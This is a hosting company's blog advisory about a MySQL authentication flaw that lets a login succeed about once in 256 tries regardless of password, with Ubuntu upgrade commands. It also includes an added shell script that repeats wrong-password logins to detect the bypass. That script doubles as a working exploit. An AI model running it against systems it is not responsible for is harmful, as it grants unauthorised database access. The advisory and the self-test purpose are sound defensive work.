Important: MySQL Vulnerability | Heart Internet Blog

Late yesterday evening, a security flaw in MySQL’s authentication system was publicly disclosed.

Without going into too much detail (links explaining the technical details are at the end of this post), some builds of MySQL will accept a login roughly 1 in 256 times regardless of the password supplied. The username still has to be a valid account, and one that is permitted to connect from the client’s address, so the attack amounts to repeating a connection attempt with any password until the server lets one through. Please note that this is not a vulnerability specific to Heart Internet in any way; it is in MySQL’s own authentication code and affects any vulnerable build wherever it is hosted.

A default MySQL install does not allow the root account to log in over the network (and enabling that is not recommended), so an attacker still needs a username that exists and is allowed to connect remotely. That limits the exposure, but any account that can connect from the network is a target, not just root.

After checking our own database servers and our customer webservers (the servers you use to host your sites), we can confirm that we are not vulnerable. If you’re hosted on the shared platform (so Starter Pro, Home Pro, Business Pro and Reseller Pro hosting on either Linux or Windows) or you have a dedicated server, then you do not need to worry or take any action.

Upgrading MySQL for VPS with Ubuntu

However, in the interest of full disclosure, we do know that some MySQL packages shipped with Ubuntu are affected; if you have an Ubuntu VPS with us, you should upgrade MySQL immediately. From a command prompt:

As root, refresh the package lists first so that the fixed package is picked up, then install it:

apt-get update
apt-get install mysql-server

Or, using sudo (the more ‘Ubuntu’ type way):

sudo apt-get update
sudo apt-get install mysql-server

Afterwards, check that the installed version matches the newest one the repositories offer:

apt-cache policy mysql-server
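If you want to see for yourself whether a server you own accepts wrong passwords, the description above (a login succeeding about 1 time in 256 regardless of password) translates directly into a repeat-and-count check. The script below is an added example written for this page; it is not code from the original post or from MySQL. It assumes the mysql command-line client is installed, the host, username and attempt count are placeholders you replace with your own, and the MYSQL_CMD variable exists only so the probe can be exercised without a real server.

```shell
#!/bin/sh
# Added example (not from the Heart Internet post): probe a MySQL server you
# own for the "1 in 256" authentication bypass by repeating a login with a
# wrong password and counting how many attempts the server accepts.
# Assumptions not stated in the post: the mysql client is on the PATH, and
# MYSQL_CMD is a hypothetical override used only to test this script offline.

MYSQL_CMD="${MYSQL_CMD:-mysql}"

# probe_bypass HOST USER ATTEMPTS
# Prints the number of attempts the server accepted with a wrong password.
# A patched server accepts none; a vulnerable build accepts roughly 1 in 256,
# so use a few hundred attempts against a real server.
probe_bypass() {
  host="$1"; user="$2"; attempts="$3"
  accepted=0
  i=0
  while [ "$i" -lt "$attempts" ]; do
    # Deliberately wrong password; output is discarded, only the exit code
    # of the client (0 = logged in and ran the query) matters.
    if "$MYSQL_CMD" -h "$host" -u "$user" --password=definitely-wrong \
         -e 'SELECT 1' >/dev/null 2>&1; then
      accepted=$((accepted + 1))
    fi
    i=$((i + 1))
  done
  echo "$accepted"
}

# verdict ACCEPTED
# Any accepted wrong-password login proves the bypass; zero only means it
# was not reproduced in this run.
verdict() {
  if [ "$1" -gt 0 ]; then
    echo "VULNERABLE"
  else
    echo "not reproduced"
  fi
}

# Usage: PROBE_HOST=127.0.0.1 PROBE_USER=root sh probe.sh
# (the probe only runs when PROBE_HOST is set, so sourcing the file is safe)
if [ -n "${PROBE_HOST:-}" ]; then
  n=$(probe_bypass "$PROBE_HOST" "${PROBE_USER:-root}" "${PROBE_ATTEMPTS:-500}")
  echo "$n accepted: $(verdict "$n")"
fi
```

Only run this against servers you are responsible for. A result of "not reproduced" is not proof that a build is fixed: the bug only shows up on builds whose memcmp routine returns values outside the range of a signed byte, so an unpatched server may pass this check and still be carrying the flaw. The package version reported by apt-cache policy is the thing to rely on; the probe is a sanity check on top of that.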

More information

For more information on the exploit, please see:

MySQL Password Flaw

A tragically comedic security flaw in MySQL

If you have any questions or concerns, please do not hesitate to contact us by raising a support ticket.

If you have web hosting elsewhere, you should contact your web host to find out if you need to take any steps to secure your websites.
